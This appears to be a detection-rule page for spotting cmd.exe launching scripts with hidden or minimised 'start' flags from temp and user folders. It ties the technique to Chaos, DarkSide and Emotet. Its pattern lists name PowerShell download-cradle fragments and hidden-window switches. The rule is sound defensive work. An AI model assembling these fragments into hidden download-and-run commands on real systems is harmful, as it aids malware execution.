LoFP LoFP / legitimate administrative scripts running from temporary folders.

Techniques

Sample rules

Cmd Launched with Hidden Start Flags to Suspicious Targets

Description

Detects cmd.exe executing commands with the “start” utility using “/b” (no window) or “/min” (minimized) flags. To reduce false positives from standard background tasks, detection is restricted to scenarios where the target is a known script extension or located in suspicious temporary/public directories. This technique was observed in Chaos, DarkSide, and Emotet malware campaigns.

Detection logic

condition: all of selection_cmd_* and 1 of selection_cli_*
selection_cli_susp_extension:
  CommandLine|contains:
  - .bat
  - .cmd
  - .cpl
  - .hta
  - .js
  - .ps1
  - .scr
  - .vbe
  - .vbs
selection_cli_susp_pattern:
  CommandLine|contains:
  - ' -nop '
  - ' -sta '
  - .downloadfile(
  - .downloadstring(
  - '-noni '
  - '-w hidden '
selection_cli_uncommon_location:
  CommandLine|contains:
  - :\Perflogs\
  - :\Temp\
  - :\Users\Default\
  - :\Windows\Temp\
  - \AppData\Roaming\
  - \Contacts\
  - \Documents\
  - \Downloads\
  - \Favorites\
  - \Favourites\
  - \inetpub\
  - \Music\
  - \Photos\
  - \Temporary Internet\
  - \Users\Public\
  - \Videos\
selection_cmd_hidden_start_1:
  CommandLine|contains|windash:
  - 'start '
  - start/b
  - start/min
selection_cmd_hidden_start_2:
  CommandLine|contains|windash:
  - '/b '
  - /b"
  - '/min '
  - /min"
selection_cmd_img:
- Image|endswith: \cmd.exe
- OriginalFileName: Cmd.Exe